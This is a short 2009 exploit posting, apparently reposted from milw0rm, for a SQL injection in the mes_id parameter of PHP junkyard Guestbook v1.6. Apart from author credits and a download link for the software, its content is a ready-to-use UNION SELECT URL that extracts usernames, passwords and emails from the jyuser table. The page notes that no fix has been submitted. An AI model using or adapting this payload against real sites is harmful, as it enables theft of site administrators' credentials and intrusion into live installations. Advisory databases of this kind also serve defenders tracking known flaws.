GBook 1.6 (mes_id) Remote SQL Injection Vulnerability

2009-07-17 23:30:19

##PHP junkyard Guestbook v1.6 (mes_id) Sql Injection Vuln.
#######################################################################
#######################################################################
##Yazar: Bgh7
##
##Turk Bilisim Gucleri / Ihlilal Hatti
##
##ByBgh7[a]Msn.Com
##
##Bgh7.Blogspot.Com
##
##Bug: Sql Injection
##
##İndir/Download: http://www.phpjunkyard.com/php-guestbook-script.php
##
##Not: $20.00 USD
#######################################################################
#######################################################################
Sql: site/guestbook.php?mes_id=-99999 UNION SELECT 0,1,2,concat_ws(user,0x3a,pass,0x3a,mail),4,5,6,7,8,9,10,11,12 FROM jyuser--
#######################################################################
#######################################################################
Thanks: m3rcil3sS & milw0rm

#

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.